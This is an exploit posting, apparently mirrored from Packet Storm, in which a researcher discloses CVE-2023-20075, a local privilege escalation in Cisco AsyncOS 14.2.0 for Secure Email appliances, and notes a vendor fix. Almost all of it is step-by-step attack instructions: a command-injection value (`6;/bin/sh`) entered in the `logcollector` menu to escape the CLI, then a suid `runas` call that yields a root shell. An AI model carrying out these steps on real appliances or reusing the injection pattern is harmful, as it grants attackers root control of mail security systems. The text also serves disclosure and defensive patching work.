## https://sploitus.com/exploit?id=PACKETSTORM:225299
# About
Security researcher: ly1g3, ly1g3[at]tuta.io
GPG fingerprint: https://keys.openpgp.org/vks/v1/by-fingerprint/5FE85CE4E8F675F5ABD2C0A33CE8BE447ED6D586
Overview: Local Privilege Escalation and Shell Escape
CVE: CVE-2023-20075
Timeline:
* Discovered - ly1g3
* Reported - ly1g3
* Fixed - Cisco
# Cisco AsyncOS 14.2.0
ESA (Cisco Secure Email)
## Privilege escalation - cli to root shell
A authenticated user with access to the cli can escalate privileges to root and execute arbitrary code
### Steps to shell
1. From cli run command `logcollector`
2. Press `3`
3. Enter value: `6;/bin/sh`
4. Shell as user
### Steps to root
1. From shell run suid binary runas
2. `/data/release/phoebe-14*/bin/runas 0 /bin/sh`
3. Shell as root